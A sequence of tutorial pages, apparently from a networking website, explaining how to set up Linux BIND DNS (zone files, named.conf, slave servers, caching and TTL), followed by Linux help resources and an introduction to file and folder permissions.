As you can see, a simple DNS request can become quite a task in order to successfully resolve the domain. This also means that there's a fair bit of traffic generated in order to complete the procedure. Whether you're paying a flat rate to your ISP or your company has a permanent connection to the Internet, the truth is that someone ends up paying for all these DNS requests ! The above example was only for one computer trying to resolve one domain. Try to imagine a company that has 500 computers connected to the Internet or an ISP with 150,000 subscribers - Now you're starting to get the big picture!

All that traffic is going to end up on the Internet if something isn't done about it, not to mention who will be paying for it!

This is where DNS Caching comes in. If we're able to cache all these requests, then we don't need to ask the ROOT DNS or any other external DNS server as long as we are trying to resolve previously visited sites or domains, because our caching system would "remember" all the previous domains we visited (and therefore resolved) and would be able to give us the IP Address we're looking for!

Note: You should keep in mind that when you install BIND, by default it's setup to be a DNS Caching server, so all you need to do it startup the service, which is called 'named'.

Almost all Internet name servers use name caching to optimise search costs. Each of these servers maintains a cache which contains all recently used names as well as a record of where the mapping information for that name was obtained. When a client (e.g your computer) asks the server to resolve a domain, the server will first check to see whether it has authority (meaning if it is in charge) for that domain. If not, the server checks its cache to see if the domain is in there and it will find it if it's been recently resolved.

Assuming that the server does find it in the cache, it will take the information and pass it on to the client but also mark the information as a nonauthoritative binding, which means the server tells the client "Here is the information you required, but keep in mind, I am not in charge of this domain".

The information can be out of date and, if it is critical for the client that it does not receive such information, it will then try to contact the authoritative DNS server for the domain and obtain the up to date information it requires.

DNS Caching Does Come with its Problems!

As you can clearly see, DNS caching can save you a lot of money, but it comes with its problems !

Caching does work well in the domain name system because name to address binding changes infrequently. However, it does change. If the servers cached the information the first time it was requested and never change that information, the entries in the cache could become incorrect.

The Solution To DNS Caching Problems

Fortunately there is a solution that will prevent DNS servers from giving out incorrect information. To ensure that the information in the cache is correct, every DNS server will time each entry and dispose of the ones that have exceeded a reasonable time. When a DNS server is asked for the information after it has removed the entry from its cache, it must go back to the authoritative source and obtain it again.

Whenever an authoritative DNS server responds to a request, it includes a Time To Live (TTL) value in the response. This TTL value is set in the zone files as you've probably already seen in the previous pages.

If you manage DNS server an are planning to introduce changes like redelegate (move) your domain to some other hosting company or if the IP Address your website currently has or changing mail servers, in the next couple weeks, then it's a good idea to get your TTL changes to a very small value well before the scheduled changes. Reason for this is because any dns server that will query your domain, website or any resource record that belongs to your domain, will cache the data for the amount of time the TTL is set.

By decreasing the $TTL value to e.g 1 hour, this will ensure that all dns data from your domain will expire in the requesters cache 1 hour after it was received. If you didn't do this, then the servers and clients (simple home users) who access your site or domain, will cache the dns data for the currently set time, which is normaly around 3 days. Not a good thing when you make a big change :)

So keep in mind all the above when your about the perform a change in the DNS server zone files. a couple of days before making the change, decrease the $TTL value to a reasonable value, not more than a few hours, and then once you complete the change, be sure you set it back to what it was.

We hope this has given you an insight on how you can save yourself, or company money and problems which occur when changing field and values in the DNS zone files!

  • Hits: 26570

Linux BIND DNS - Part 5: Configure Secondary (Slave) DNS Server

Setting up a Secondary (or Slave) DNS sever is much easier than you might think. All the hard work is done when you setup the Master DNS server by creating your database zone files and configuring the named.conf file.

If you are wondering how is it that the Slave DNS server is easy to setup, well you need to remember that all the Slave DNS server does is update its database from the Master DNS server (zone transfer) so almost all the files we configure on the Master DNS server are copied to the Slave DNS server, which acts as a backup in case the Master DNS server fails.

Setting Up The Slave DNS Server

Let's have a closer look at the requirements for getting our Slave DNS server up and running.

Keeping in mind that the Slave DNS server is on another machine, we are assuming that you have downloaded and successfully installed the same BIND version on it. We need to copy 3 files from the Master DNS server, make some minor modifications to one file and launch our Slave DNS server.... the rest will happen automatically :)

So which files do we copy?

The files required are the following:

  • named.conf (our configuration file)
  • named.ca or db.cache (the root hints file, contains all root servers)
  • named.local (local loopback for the specific DNS server so it can direct traffic to itself)

The rest of the files, which are our db.DOMAIN (db.firewall.cx for our example) and db.in-addr.arpa (db.192.168.0 for our example), will be transferred automatically (zone transfer) as soon as the newly brought up Slave DNS server contacts the Master DNS server to check for any zone files.

How do I copy these files?

There are plenty of ways to copy the files between servers. The method you will use depends on where the servers are located. If, for example, they are right next to you, you can simply use a floppy disk to copy them or use ftp to transfer them.

If you're going to try to transfer them over a network, and especially over the Internet, then you might consider something more secure than ftp. We would recommend you use SCP, which stands for Secure Copy and uses SSH (Secure SHell).

SCP can be used independently of SSH as long as there is an SSH server on the other side. SCP will allow you to transfer files over an encrypted connection and therefore is preferred for sensitive files, plus you get to learn a new command :)

The command used is as follows: scp localfile-to-copy username@remotehost:desitnation-folder. Here is the command line we used from our Gateway server (Master DNS): scp /etc/named.conf root@voyager:/etc/

Keep in mind that the files we copy are placed in the same directory as on the Master DNS server. Once we have copied all three files we need to modify the named.conf file. To make things simple, we are going to show you the original file copied from the Master DNS and the modified version which now sits on the Slave DNS server.

The Master named.conf file is a clear cut/paste from the "Common BIND Files" page, whereas the Slave named.conf has been modifed to suit our Slave DNS server. To help you identify the changes, we have marked them in red:

Master named.conf file

options {
directory "/var/named";

};


// Root Servers
zone "." IN {
type hint;
file "named.ca";
};

// Entry for Firewall.cx - name to ip mapping
zone "firewall.cx" IN {
type master;
file "db.firewall.cx";
};


// Entry for firewall.cx - ip to name mapping
zone "0.168.192.in-addr.arpa" IN {
type master;
file "db.192.168.0";
};

// Entry for Local Loopback
zone "0.0.127.in-addr.arpa" IN {
type master;
file "named.local";
};

 

Slave named.conf file

options {
directory "/var/named";

};


// Root Servers
zone "." IN {
type hint;
file "named.ca";
};

// Entry for Firewall.cx - name to ip mapping
zone "firewall.cx" IN {
type slave;
file "bak.firewall.cx";
masters { 192.168.0.10 ; } ;
};

// Entry for firewall.cx - ip to name mapping
zone "0.168.192.in-addr.arpa" IN {
type slave;
file "bak.192.168.0";
masters { 192.168.0.10 ; } ;
};

// Entry for Local Loopback
zone "0.0.127.in-addr.arpa" IN {
type master;
file "named.local";
};

 As you can see, most of the slave's named.conf file is similair to the master's, except for a few fields and values, which we are going to explain right now.

The type value is now slave, and that's pretty logical since it tells the dns server if it's a master or slave.

The file "bak.firewall.cx"; entry basically tells the server what name to give the zone files once they are transfered from the master dns server. We tend to follow the bak.domain format because that's the way we see the slave server, a backup dns server. It is not imperative to use this name scheme, you can change it to whatever you wish. Once the server is up and running, you will see these files soon appear in the /var/named directory.

Lastly, the masters {192.168.0.10}; entry informs our slave server that this is the IP Address of the master DNS which it needs to contact and retrieve the zone files. That's all there is to setup the slave DNS server ! As we mentioned, once the master is setup, the slave is a peice of cake cause it involves very few changes.

Our Final article covers the setup of  Linux BIND DNS Caching.

  • Hits: 52258

Linux BIND DNS - Part 4: Common BIND Files - Named.local, named.conf, db.127.0.0 etc

So far we have covered in great detail the main files required for the firewall.cx domain. These files, which we named db.firewall.cx and db.192.168.0, define all the resouce records and hosts available in the firewall.cx domain.

We will be analysing these files in this article, to help you understand why they exist and how they fit into the big picture :

Our Common Files

There are 3 common files that we're going to look at, of which the first two files contents change slightly depending on the domain. This happens because they must be aware of the various hosts and the domain name for which they are created. The third file in the list below, is always the same amongst all DNS servers and we will explain more about it later on.

So here are our files:

  • named.local or db.127.0.0
  • named.conf
  • named.ca or db.cache

The Named.local File

The named.local file, or db.127.0.0 as some might call it, is used to cover the loopback network. Since no one was given the responsibility for the 127.0.0.0 network, we need this file to make sure there are no errors when the DNS server needs to direct traffic to itself (127.0.0.1 IP Address - Loopback).

When installing BIND, you will find this file in your caching example directory: /var/named/caching-example, so you can either create a new one or modify the existing one to meet your requirements.

The file is no different than our example db.addr file we saw previously:

$TTL 86400

0.0.127.in-addr.arpa. IN SOA voyager.firewall.cx. admin.firewall.cx. (

                1 ; Serial
                3h ; Refresh after 3 hours
                1h ; Retry after 1 hour
                1w ; Expire after 1 week
                1h ) ; Negative caching TTL of 1 hour

 

0.0.127.in-addr.arpa. IN NS voyager.firewall.cx.
0.0.127.in-addr.arpa. IN NS gateway.firewall.cx.
1.0.0.127.in-addr.arpa. IN PTR localhost.

That's all there is for named.local file !

The Named.ca File

The named.ca file (also known as the "root hints file") is created when you install BIND and dosen't need to be modified unless you have an old version of BIND or it's been a while since you installed BIND.

The purpose of this file is to let your DNS server know about the Internet ROOT Servers. There is no point displaying all of the file's content because it's quite big, so we will show an entry of a ROOT server to get the idea what it looks like:

; last update: Aug 22, 2011
; related version of root zone: 1997082200
; formerly NS.INTERNIC.NET

. 3600000 IN NS A.ROOT-SERVERS.NET.
A.ROOT-SERVERS.NET. 3600000 A 198.41.0.4
The domain name "." refers to the root zone and the value 3600000 is the explicit time to live (TTL) for the records in the file, but it is sometime ignored by DNS clients.

The rest of the entries are self explanatory. If you want to grab a new copy of the root hint file you can ftp to ftp.rs.internic.net (198.41.0.6) and log on anonymously, there you will find the latest up to date version.

The Named.conf File

The named.conf file is usually located in the /etc directory and is the key file that ties all the zone data files together and lets the DNS server know where they are located in the system. This file is automatically created during the installation but you must edit it in order to add new entries that will point to any new zone files you have created.

Let's have a close look at the named.conf file and explain:

options {
directory "/var/named";

};

// Root Servers
zone "." IN {
type hint;
file "named.ca";
};

// Entry for Firewall.cx - name to ip mapping
zone "firewall.cx" IN {
type master;
file "db.firewall.cx";
};

// Entry for Firewall.cx - ip to name mapping
zone "0.168.192.in-addr.arpa" IN {
type master;
file "db.192.168.0";
};

// Entry for Local Loopback
zone "0.0.127.in-addr.arpa" IN {
type master;
file "named.local";
};

At first glance it might seem a maze, but it's a lot simpler than you think. Break down each paragraph and you can see clearly the pattern that follows.

Starting from the top, the options section simply defines the directory where all the files to follow are located, the rest are simply comments.

The root servers section tells the DNS server where to find the root hints file, which contains all the root servers.

Next up is the entry for our domain firewall.cx, we let the DNS server know which file contains all the zone entries for this domain and let it know that it will act as a master DNS server for the domain. The same applies for the entry to follow, which contains the IP to Name mappings, this is the 0.168.192.in-addr.arpa zone.

The last entry is required for the local loopback. We tell the DNS server which file contains the local loopback entries.

Notice the "IN" class that is present in each section? If we accidentally forget to include it in our zone files, it wouldn't matter because the DNS server will automatically figure out the class from our named.conf file. It's imperative not to forget the "IN" (Internet) class in the named.conf, whereas it really doesnt matter if you don't put it in the zone files. It's good practice still to enter it in the zone files as we did, just to make sure you don't have any problems later on.

And that ends our discussion for the common DNS (BIND) files.  Next up is the configuration of our Linux BIND Slave/Secondary DNS server.

 

 

  • Hits: 32166

Linux BIND DNS - Part 3: Configuring The db.192.168.0 Zone Data File

The db.192.168.0 zone data file is the second file we need to create and configure for our BIND DNS server. As outlined in the DNS-BIND Introduction, this file's purpose is to provide the IP Address -to- name mappings. Note that this file is to be placed on the Master DNS server for our domain.

Constructing The db.192.168.0 File

While we start to construct the file, you will notice many similarities with our previous file. Most resource records have already been covered and explained in our previous articles and therefore we will not repeat on this page.

The first line is our $TTL control statement, followed by the Start Of Authority (SOA) resource record:

$TTL 86400

0.168.192.in-addr.arpa. IN SOA voyager.firewall.cx. admin.firewall.cx. (

                     1 ; Serial
                     3h ; Refresh after 3 hours
                     1h ; Retry after 1 hour
                     1w ; Expire after one week
                     1h ) ; Negative Caching TTL of 1 hour
As you can see, everything above, except the first column of the first line, is identical to the db.firewall.cx file. The "0.168.192.in-addr.arpa" entry is our IP network in reverse order. The trick to figure out your own in-addr.arpa entry is to simply take your network address, reverse it, and add an ".in-addr.arpa." at the end

Name server resource records are next, follwed by the PTR resource record that creates our IP Address-to-name mappings. The syntax is nearly the same as the db.domain file, but keep in mind that we don't enter the full reversed IP Address for the name servers but only the first 3 octets which represent the network they belong to:

; Name Servers defined here
0.168.192.in-addr.arpa. IN NS voyager.firewall.cx.
0.168.192.in-addr.arpa. IN NS gateway.firewall.cx.

; IP Address to Name mappings
1.0.168.192.in-addr.arpa. IN PTR admin.firewall.cx.
5.0.168.192.in-addr.arpa. IN PTR enterprise.firewall.cx.
10.0.168.192.in-addr.arpa. IN PTR gateway.firewall.cx.
15.0.168.192.in-addr.arpa. IN PTR voyager.firewall.cx.

 Time to look at the configuration file with all its entries:

$TTL 86400

0.168.192.in-addr.arpa. IN SOA voyager.firewall.cx. admin.firewall.cx. (

                     1 ; Serial
                     3h ; Refresh after 3 hours
                     1h ; Retry after 1 hour
                     1w ; Expire after one week
                     1h ) ; Negative Caching TTL of 1 hour

; Name Servers defined here
0.168.192.in-addr.arpa. IN NS voyager.firewall.cx.
0.168.192.in-addr.arpa. IN NS gateway.firewall.cx.

; IP Address to Name mappings
1.0.168.192.in-addr.arpa. IN PTR admin.firewall.cx.
5.0.168.192.in-addr.arpa. IN PTR enterprise.firewall.cx.
10.0.168.192.in-addr.arpa. IN PTR gateway.firewall.cx.
15.0.168.192.in-addr.arpa. IN PTR voyager.firewall.cx.

This completes the confgiuration of our db.192.168.0 Zone data file.

Remember the whole purpose of this file is to provide an IP Address-to-name mapping, which is why we do not use the domain name in front of each line, but the reversed IP Address followed by the in-addr.arpa. entry. Next article deals with the Common Files in Linux BIND DNS.

  • Hits: 50299

Linux BIND DNS - Part 2: Configuring db.domain Zone Data File

It's time to start creating our zone files. We'll follow the standard format, which is given in the DNS RFCs, in order to keep everything neat and less confusing.

First step is to decide on the domain we're using and we've decided on the popular firewall.cx. This means that the first zone file will be db.firewall.cx. Note that this file is to be placed on the Master DNS server for our domain.

We will progressively build our database by populating it step by step and explaining each step we take. At the end of the step-by-step example, we'll grab each step's data and put it all together so we can see how the final version of our file will look. We strongly beleive, this is the best method of explaining how to create a zone file without confusing the hell out of everyone!

Constructing db.firewall.cx - db.domain

It is important at this point to make it clear that we are setting up a primary DNS server. For a simple DNS caching or secondary name server, the setup is a lot simpler and covered on the articles to come.

The first entry for our file is the Default TTL - Time To Live. This is defined using the $TTL control statement. $TTL specifies the time to live for all records in the file that follow the statement and don't have an explicit TTL. We are going to set ours to 24 hours - 86400 seconds.

The units used are seconds. An older common TTL value for DNS was 86400 seconds, which is 24 hours. A TTL value of 86400 would mean that, if a DNS record was changed on the authoritative nameserver, DNS servers around the world could still be showing the old value from their cache for up to 24 hours after the change.

Newer DNS methods that are part of a DR (Disaster Recovery) system may have some records deliberately set extremely low on TTL. For example a 300 second TTL would help key records expire in 5 minutes to help ensure these records are flushed world wide quickly. This gives administrators the ability to edit and update records in a timely manner. TTL values are "per record" and setting this value on specific records is normally honored automatically by all standard DNS systems world-wide.   Dynamic DNS (DDNS) usually have the TTL value set to 5 minutes, or 300 seconds.

Next up is the SOA Record. The SOA (Start Of Authority) resource record indicates that this name server is the best source of information for the data within this zone (this record is required in each db.DOMAIN and db.ADDR file), which is the same as saying this name server is Authoritative for this zone. There can be only one SOA record in every data zone file (db.DOMAIN).

$TTL 86400

firewall.cx. IN SOA voyager.firewall.cx. admin.voyager.firewall.cx. (
                            1 ; Serial Number
                            3h ; Refresh after 3 hours
                            1h ; Retry after 1 hour
                            1w ; Expire after 1 week
                            1h ) ; Negative caching TTL of 1 hour

Let's explain the above code:

firewall.cx. is the domain name and must always be stated in the first column of our line, be sure you include the trailing dot "." after the domain name, we'll explain later on why this is needed.

The IN stands for Internet. This is one class of data and while other classes exist, you won't see them at all because they are not used :)

The SOA is an important resource record. What follows is the actual primary name server for firewall.cx. In our example, this is the server named "voyager" and its Fully Qualified Domain Name (FQDN) is voyager.firewall.cx. Notice the trailing "." is present here as well.

Next up is the entry admin.voyager.firewall.cx. which is the email address of the person responsible for this domain. Take the dot "." after the admin entry and replace it with a "@" and you have a valid email address: This email address is being protected from spambots. You need JavaScript enabled to view it.. Most times you will see root, postmaster or hostmaster instead of "admin".

The "(" parentheses allow the SOA record to span more than one line, while in most cases the fields that follow are used by the secondary name servers and any other name server requesting information about the domain.

The serial number "1 ; Serial Number" entry is used by the secondary name server to keep track of changes that might have occured in the master's zone file. When the secondary name server contacts the primary name server, it will check to see if this value is the same. If the secondary's name server is lower than the primary's, then its data is out of date and, when equal, it means the data is up to date. This means when you make any modifications to the primary's zone file, you must increment the serial number at least by one.

Note that anything after the semicolon (;) is considered a remark and not taken into consideration by the DNS BIND Service. This allows us to create easy-to-understand comments for future reference.

The refresh "3h ; Refresh after 3 hours" tells the secondary name server how often to check the primary's server's data, to ensure its copy for this zone is up to date.

If the secondary name server tries to contact the primary and fails, the retry "1 h ; Retry after 1 hour" is used to tell the secondary name server how long to wait until it tries to contact the primary again.

If the secondary name server fails to contact the primary for longer than the time specified in the fourth entry "1 w ; Expire after 1 week", then the zone data on the secondary name server is considered too old and will expire.

The last line "1 h ) ; Negative caching TTL of 1 day" is how long a name server will send negative responses about the zone. These negative responses say that a particular domain or type of data sought for a particular domain name doesn't exist. Notice the SOA section finishes with the ")" parentheses.

Next up in the file are the name server (NS) records:

; Name Servers defined here

firewall.cx. IN NS voyager.firewall.cx.

firewall.cx. IN NS gateway.firewall.cx.

These entries define the two name servers (voyager and gateway) for our domain firewall.cx. These entries will be also in the db.ADDR file for this domain as we will see later on.

It's time to enter our MX records. These records define the mail exchange servers for our domain, and this is how any client, host or email server is able to find a domain's email server:

; Mail Exchange servers defined here

firewall.cx. IN MX 10 voyager.firewall.cx.

firewall.cx. IN MX 20 gateway.firewall.cx.

Let's explain what exactly these entries mean. The first line specifies that voyager.firewall.cx is a mail exchanger for firewall.cx, just as the second line (...IN MX 20 gateway...) specifies that gateway.firewall.cx is also a mail exchanger for the domain. The MX record indicates that the following hosts are mail exchanger servers for the domain and the numbers 10 and 20 indicate the priority level. The smaller the number, the higher the priority.

This means that voyager.firewall.cx is a higher priority mail server than gateway.firewall.cx.  If another server trying to send email to firewall.cx fails to contact the highest priority mail server (voyager.firewall.cx), it will then fall back to the secondary, in which our case is gateway.firewall.cx.

These entries were introduced to prevent mail loops. When another email server (unlikely for a private domain like mine, but the same rule applies for the Internet) wants to send mail to firewall.cx, it will try to contact first the mail exchanger with the smallest number, which in our case is voyager.firewall.cx. The smaller the number, the higher the priority if there are more than one mail servers.

In our example, if we replaced:

firewall.cx. IN MX 10 voyager.firewall.cx.

firewall.cx. IN MX 20 gateway.firewall.cx.

with

firewall.cx. IN MX 50 voyager.firewall.cx.

firewall.cx. IN MX 100 gateway.firewall.cx.

the result in matter of server priority, would be the same.

Let's now have a look our next part of our zone file: Host IP Addresses and Alias records:

; Host addresses defined here

localhost.firewall.cx. IN A 127.0.0.1

voyager.firewall.cx. IN A 192.168.0.15

enterprise.firewall.cx. IN A 192.168.0.5

gateway.firewall.cx. IN A 192.168.0.10

admin.firewall.cx. IN A 192.168.0.1

; Aliases

www.firewall.cx. IN CNAME voyager.firewall.cx.

Most fields in this section are easy to understand. We start by defining our localhost (local loopback) "localhost.firewall.cx. IN A 127.0.0.1" and continue with the servers on our private network, these include voyager, enterprise, gateway and admin. The "A" record stands for IP Address. So "voyager.firewall.cx. IN A 192.168.0.15" translates to a host called voyager located in the firewall.cx domain with an INternet ip Address of 192.168.0.15. See the pattern? :)

The second block has the aliases table, where we created a Canonical Name (CNAME) record. A CNAME record simply maps an alias to its canonical name; in our example, www is the alias and voyager.firewall.cx is the canonical name.

When a name server looks up a name and finds CNAME records, it replaces the name (alias - www) with its canonical name (voyager.firewall.cx) and looks up the canonical name (voyager.firewall.cx).

For example, when a name server looks up www.firewall.cx, it will replace the 'www' with 'voyager' and lookup the IP Address for voyager.firewall.cx.

This also explains the existance of "www" in all URLs - it's nothing more than an alias which, ultimately, is replaced with the CNAME record defined.

The Complete db.domain Configuration File

That completes a simple domain setup! We have now created a working zone file that looks like this:

$TTL 86400

firewall.cx. IN SOA voyager.firewall.cx. admin.voyager.firewall.cx. (
                            1 ; Serial Number
                            3h ; Refresh after 3 hours
                            1h ; Retry after 1 hour
                            1w ; Expire after 1 week
                            1h ) ; Negative caching TTL of 1 hour

; Name Servers defined here

firewall.cx. IN NS voyager.firewall.cx.

firewall.cx. IN NS gateway.firewall.cx.

; Mail Exchange servers defined here

firewall.cx. IN MX 10 voyager.firewall.cx.

firewall.cx. IN MX 20 gateway.firewall.cx.

; Host Addresses Defined Here

localhost.firewall.cx. IN A 127.0.0.1

voyager.firewall.cx. IN A 192.168.0.15

enterprise.firewall.cx. IN A 192.168.0.5

gateway.firewall.cx. IN A 192.168.0.10

admin.firewall.cx. IN A 192.168.0.1

; Aliases

www.firewall.cx. IN CNAME voyager.firewall.cx.

A quick glance at this file tells you a lot about our lab domain firewall.cx, and this is probably the best time to explain why we should not omit the trailing dot at the end of the domain name:

If we took gateway.firewall.cx as an example and omitted the dot "." at the end of our entries, the system would translate it like this: gateway.firewall.cx.firewall.cx - definately not  what we want!

As you see, the 'firewall.cx' is appended to the end of our Fully Qualified Domain Name for the particular resource record (gateway). This is why it's so important to never forget that extra dot "." at the end!

Our next article will cover the db.ADDR file, which will take the name db.192.168.0. for our example.

  • Hits: 46165

Linux BIND DNS - Part 1: Introduction To The DNS Database (BIND)

BIND (Berkely Internet Name Domain) is a popular software for translating domain names into IP addresses and usually found on Linux servers. This article will explain the basic concepts of DNS BIND and analyse the associated files required to successfully setup your own DNS BIND server. After reading this article, you will be able to successfully install and setup a Linux BIND DNS server for your network.

Zones and Domains

The programs that store information about the domain name space are called name servers, as you probably already know. Name Servers generally have complete information about some part of the domain name space (a zone), which they load from a file. The name server is then said to have authority for that zone.

The term zone is not one that you come across every day while you're surfing on the Internet. We tend to think that the domain concept is all there is when it comes to DNS, which makes life easy for us, but when dealing with DNS servers that hold data for our domains (name servers), then we need to introduce the zone term since it is essential so we can understand the setup of a DNS server.

The difference between a zone and a domain is important, but subtle. The best way to understand the difference is by using a good example, which is coming up next.

The COM domain is divided into many zones, including the hp.com zone, sun.com, it.com. At the top of the domain, there is also a com zone.

The diagram below shows you how a zone fits within a domain:

 dns-bind-intro-1

 

The trick to understanding how it works is to remember that a zone exists "inside" a domain. Name servers load zone files, not domains. Zone files contain information about the portion of a domain for which they are responsible. This could be the whole domain (sun.com, it.com) or simply a portion of it (hp.com + pr.hp.com).

In our example, the hp.com domain has two subdomains, support.hp.com and pr.hp.com. The first one, support.hp.com is controlled by its own name servers as it has its own zone, called the support.hp.com zone. The second one though, pr.hp.com is controlled by the same name server that takes care of the hp.com zone.

The hp.com zone has very little information about the support.hp.com zone, it simply knows its right below. If anyone requires more information on support.hp.com, it will be requested to contact the authoritative name servsers for that subdomain, which are the name servers for that zone.

So you see that even though support.hp.com is a subdomain just like pr.hp.com, it is not setup and controlled the same way as pr.hp.com.

On the other hand, the Sun.com domain has one zone (sun.com zone) that contains and controlls the whole domain. This zone is loaded by the authoritative name servers.

BIND? Never Heard of it!

As mentioned in the beginning of this article, BIND stands for Berkely Internet Name Domain. Keeping things simple, it's a program you download (www.bind.org) and install on your Unix or Linux server to give it the ability to become a DNS server for your private (lan) or public (Internet) network.

The majority of DNS servers are based on BIND as it's a proven and reliable DNS server. The download is approximately 4.8 MBytes. Untarring and compiling BIND is a pretty straight forward process and the steps required will depend on your Linux distribution and version. If you follow the instructions provided with the download, you shouldn't have any problems.  For simplicity purposes, we assume you've compiled and installed the BIND program using the provided instructions.

Setting Up Your Zone Data

No matter what Linux distribution you have, the file structure is pretty much the same. I have BIND installed on my Linux server, which runs Slackware v8 with kernel 2.4.19. By following the installation procedure found in the documentation provided with BIND, you will have the server installed within 15 min at most.

Once the installation of BIND is complete you need to start creating your zone data files. Remember, these are the files the DNS server will load in order to understand how your domain is setup and the various hosts within it.

A DNS server has multiple files that contain information about the domain setup. From these files, one will map all host names to IP Addresses and other files will map the IP Address back to hostnames. The name-to-IP Address lookup is sometimes called forward mapping and the IP Address-to-name lookup reverse mapping. Each network will have its own file for reverse-mapping.

As a convention in this section, a file that maps hostnames to IP Addresses will be called db.DOMAIN, where DOMAIN is the name of your domain e.g. db.firewall.cx, and db is short for DataBase.The files mapping IP Address to hostnames are called db.ADDR where ADDR is the network number without trailing zeros or the specification of a netmask, e.g db.192.168.0 for the 192.168.0.0 network.

The collection of our db.DOMAIN and db.ADDR files are our Zone Data files. There are a few other zone data files, some of which are created during the installation of BIND: named.ca, localhost.zone and named.local.

Named.ca contains information about the root servers on the Internet, should your DNS server require to contact one of them. Localhost.zone and Named.local are there to cover the loopback network. The loopback address is a special address hosts use to direct traffic to themselves. This is usually IP Address 127.0.0.1, which belongs to the 127.0.0.0/24 network.

These files must be present in each DNS server and are the same for every DNS server.

Quick Summary of Our Files

Let's have a quick look at the files we have covered so far to make sure we don't lose track:

1) Following files must be created by you and will contain the data for our zone:

  • db.DOMAIN e.g db.space.net - Host to IP Address mapping
  • db.ADDR e.g db.192.168.0 - IP Address to Host mapping

2) Following files are usually created by the BIND installation:

  • named.ca - Contains the ROOT DNS servers
  • named.local & localhost.zone - Special files so the server can direct traffic to itself.

You should also be aware that the file names can change, there is no standard for names, it's just very convenient and tidy to keep some type of convention.

To tie all the zone data files together a name server needs a configuration file. BIND version 8 and above calls it named.conf and it can be found in your /etc dir once you install the BIND package. Named.conf simply tells the name server where your zone files are located and we will be analysing this file later on.

Most entries in the zone data files are called DNS resource records. Since DNS lookups are case insensitive, you can enter names in your zone data files in uppercase, lowercase or mixed case. I tend to use lowercase.

Resource records must start in the first column of a line. The DNS RFCs have samples that present the order in which one should enter the resource records. Some people choose to follow this order, while others don't. You are not required to follow this order, but I do :)

Here is the order of resource records in the zone data file:

SOA record - Indicates authority for this zone.

NS record - Lists a name server for this zone

MX record - Indicates the mail exchange server for the domain

A record - Name to IP Address mapping (gives the IP Address for a host)

CNAME record - Canonical name (used for aliases)

PTR record - Address to name mapping (used in db.ADDR)

The next article (Part 2) deals with the construction of our first zone data file, db.firewall.cx of our example firewall.cx domain.

 

 

  • Hits: 181095

Finding More Information On The Linux Operating System

Since this document merely scratches the surface when it comes to Linux, you will probably find you have lots of questions and possibly problems. Whether these are problems with the operating system, or not knowing the proper way to perform the task in Linux, there is always a place to find help.

On our forums you'll find a lot of experienced people always willing to go that extra mile to help you out, so don't hesitate to ask - you'll be suprised at the responses!

Generally the Linux community is a very helpful one. You'll be happy to know that there is more documentation, tutorials, HOW-TOs and FAQs (Frequently Asked Questions) for Linux than for all other operating systems in the world!

If you go to any search engine, forum or news group researching a problem, you'll always find an answer.

To save you some searching, here are a few websites where you can find information covering most aspects of the operating system:

  • https://tldp.org/ - The Linux Documentation Project homepage has the largest collection of tutorials, HOW-TOs and FAQs for Linux.
  • https://www.linux.org/- The documentation page from the official Linux.org website. Contains links to a lot of useful information.
  • https://forums.justlinux.com/ - Contains a library of information for beginners on all topics from setting up hardware, installing software, to compiling the kernel
  • https://rpm.pbone.net/ - Pbone is a great search engine to find RPM packages for your Linux operating system.
  • https://sourceforge.net/ - The world's largest development and download repository of Open Source code (free) and applications. Sourceforge hosts thousands of open source projects, most of which are of course for the Linux operating system.

We hope you have enjoyed this brief introduction to the Linux operating system and hope you'll be tempted to try Linux for yourself. You've surely got nothing to lose and everything to gain!

Remember, Linux is the No.1 operating system when it comes to web services and mission critical servers - it's not a coincidence other major software vendors are doing everything they can to stop Linux from gaining more ground!

Visit our Linux section to discover more engaging technical articles on the Linux Operating system.

  • Hits: 18728

Linux File & Folder Permissions

File & folder security is a big part of any operating system and Linux is no exception!

These permissions allow you to choose exactly who can access your files and folders, providing an overall enhanced security system. This is one of the major weaknesses in the older Windows operating systems where, by default, all users can see each other's files (Windows 95, 98, Me).

For the more superior versions of the Windows operating system such as NT, 2000, XP and 2003 things look a lot safer as they fully support file & folder permissions, just as Linux has since the beginning.

Together, we'll now examine a directory listing from our Linux lab server, to help us understand the information provided. While a simple 'ls' will give you the file and directory listing within a given directory, adding the flag '-l' will reveal a number of new fields that we are about to take a look at:

linux-introduction-file-permissions-1

It's possible that most Linux users have seen similar information regarding their files and folders and therefore should feel pretty comfortable with it. If on the other hand you happen to fall in to the group of people who haven't seen such information before, then you either work too much in the GUI interface of Linux, or simply haven't had much experience with the operating system :)

Whatever the case, don't disappear - it's easier than you think!!

Understanding "drwx"

Let's start from scratch, analysing the information in the previous screenshot.

linux-introduction-file-permissions-2

In the yellow column on the right we have the file & directory names (dirlist.txt, document1, document2 etc.) - nothing new here. Next, in the green column, we will find the time and date of creation.

Note that the date and time column will not always display in the format shown. If the file or directory it refers to was created in a year different from the current one, it will then show only the date, month and year, discarding the time of creation.

For example, if the file 'dirlist.txt' was created on the 27th of July, 2004, then the system would show:

Jun 27 2004 dirlist.txt

instead of

Jun 27 11:28 dirlist.txt

A small but important note when examining files and folders! Lastly, the date will change when modifying the file. As such, if we edited a file created last year, then the next time we typed 'ls -l', the file's date information would change to today's date. This is a way you can check to see if files have been modified or tampered with.

The next column (purple) contains the file size in bytes - again nothing special here.

linux-introduction-file-permissions-3

Next column (orange) shows the permissions. Every file in Linux is 'owned' by a particular user.. normally this is the user (owner) who created the file.. but you can always give ownership to someone else.

The owner might belong to a particular group, in which case this file is also associated with the user's group. In our example, the left column labeled 'User' refers to the actual user that owns the file, while the right column labeled 'group' refers to the group the file belongs to.

Looking at the file named 'dirlist.txt', we can now understand that it belongs to the user named 'root' and group named 'sys'.

Following the permissions is the column with the cyan border in the listing.

The system identifies files by their inode number, which is the unique file system identifier for the file. A directory is actually a listing of inode numbers with their corresponding filenames. Each filename in a directory is a link to a particular inode.

Links let you give a single file more than one name. Therefore, the numbers indicated in the cyan column specifies the number of links to the file.

As it turns out, a directory is actually just a file containing information about link-to-inode associations.

Next up is a very important column, that's the first one on the left containing the '-rwx----w-' characters. These are the actual permissions set for the particular file or directory we are examining.

To make things easier, we've split the permissions section into a further 4 columns as shown above. The first column indicates whether we are talking about a directory (d), file (-) or link (l).

In the newer Linux distributions, the system will usually present the directory name in colour, helping it to stand out from the rest of the files. In the case of a file, a dash (-) or the letter 'f' is used, while links make the use of the letter 'l' (l). For those unfamiliar with links, consider them something similar to the Windows shortcuts.

linux-introduction-file-permissions-4

Column 2 refers to the user rights. This is the owner of the file, directory or link and these three characters determine what the owner can do with it.

